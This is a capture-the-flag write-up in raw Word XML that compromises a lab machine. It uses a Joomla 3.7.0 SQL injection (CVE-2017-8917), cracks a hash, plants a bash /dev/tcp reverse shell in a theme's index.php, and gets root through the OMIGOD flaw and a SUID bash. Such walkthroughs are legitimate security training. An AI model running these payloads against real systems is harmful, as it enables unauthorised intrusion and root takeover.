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GODGOD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19kswqtryqwx"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the running services and identify accessible ports. To accomplish this task, we will use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 a specialized tool for network mapping and service analysis.</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4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the Nmap output, we identified the presence of web services on ports </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">80</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1337</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. On port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1337</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we observed that the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Joomla CMS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is running.</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begin by exploring the CMS, since it is the most prominent element and deserves initial, more detailed attention.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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49600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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performing a quick search on the internet for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">“How to get joomla version by http?”</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> In order to obtain the version, we can access </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/administrator/manifests/files/joomla.xml </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to identify the specific version of this CMS.</w:t>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81400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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researching vulnerabilities in Joomla version </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.7.0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we identified the presence of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2017-8917</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which refers to an SQL Injection vulnerability in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">COM_FIELDS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> component. There is an available exploit to leverage this vulnerability:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId11">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/stefanlucas/Exploit-Joomla</w:t>
        </w:r>
      </w:hyperlink>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using the exploit, we successfully extracted the username and password hash from the table </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dp2bh_users. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It is evident that this user is a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Super User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5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password hash in our possession, we can use the tool </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">John the Ripper</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to crack it.</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79600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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password obtained, we can access </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/administrator </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and authenticate into the CMS.</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5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16300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="50"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administrator access to the CMS, we can modify a theme to insert a reverse shell payload, thus allowing us to obtain a shell on the server.</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00400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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edit the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">index.php:</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3289300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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system("/bin/bash -c 'sh -i &gt;&amp; /dev/tcp/&lt;ip-vpn&gt;/4444 0&gt;&amp;1'");</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sgulaiazx4py" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Netcat listener to receive the connection:</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6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75000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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incorporating our reverse shell payload into the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">index.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file, we can click </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"Save"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and then </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"Template Preview"</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5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receive the shell connection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">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w5s89jr9oqk6" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrading a simple shell to fully interactive TTYs:</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script /dev/null -c bash</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were able to obtain the first flag.</w:t>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6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our first user flag, it is time to escalate privileges to obtain our final flag. For this, we need to escalate to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observed within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the presence of the directories </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">microsoft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omi. </w:t>
      </w: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ss -nlapt </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to obtain detailed information about network connections, we identified that port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5986</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is configured to accept connections locally only.</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researching </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OMI</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we discovered that it is an open-source remote configuration management tool developed by Microsoft. We also identified the existence of a remote code execution vulnerability, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2021-38647</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vulnerability allows the execution of commands as root by sending a SOAP payload </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"ExecuteShellCommand"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the server without specifying any authentication header.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">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OMIGOD - RCE Vulnerability in Multiple Azure Linux Deployments – Horizon3.ai | Blog</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId22">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/</w:t>
        </w:r>
      </w:hyperlink>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GitHub - horizon3ai/CVE-2021-38647: Proof of Concept Exploit for CVE-2021-38647 (OMIGOD)</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId23">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/horizon3ai/CVE-2021-38647</w:t>
        </w:r>
      </w:hyperlink>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71800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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exploit to the machine, you may also choose to simply copy the exploit and save it directly on the server using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nano</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executing the exploit, we successfully achieved remote code execution (RCE), as demonstrated in the output of the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id.</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5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remote code execution (RCE), we can grant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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> binary the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> permission. This way, we can execute Bash specifying the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter, allowing execution of the binary with the permissions of its owner, thus obtaining our final flag.</w:t>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5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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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chmod u+s /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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bash -p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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we can retrieve the final flag located in:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">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/root/root.txt</w:t>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5">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4"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46">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47">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6.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image6.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GodGod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www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/horizon3ai/CVE-2021-386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7.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.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4.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https://github.com/stefanlucas/Exploit-Joomla" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.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mHnyezWRYewMRj2G1TgD2qCeYA==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLjE5a3N3cXRyeXF3eDIOaC5zZ3VsYWlheng0cHkyDmgudzVzODlqcjlvcWs2Mg5oLjE3NWY1Y3M5NHowbzgAciExdmZFclRYR3J3V3FVaUJzRW9WX0d1aDZ5aXg5VHZuYUo=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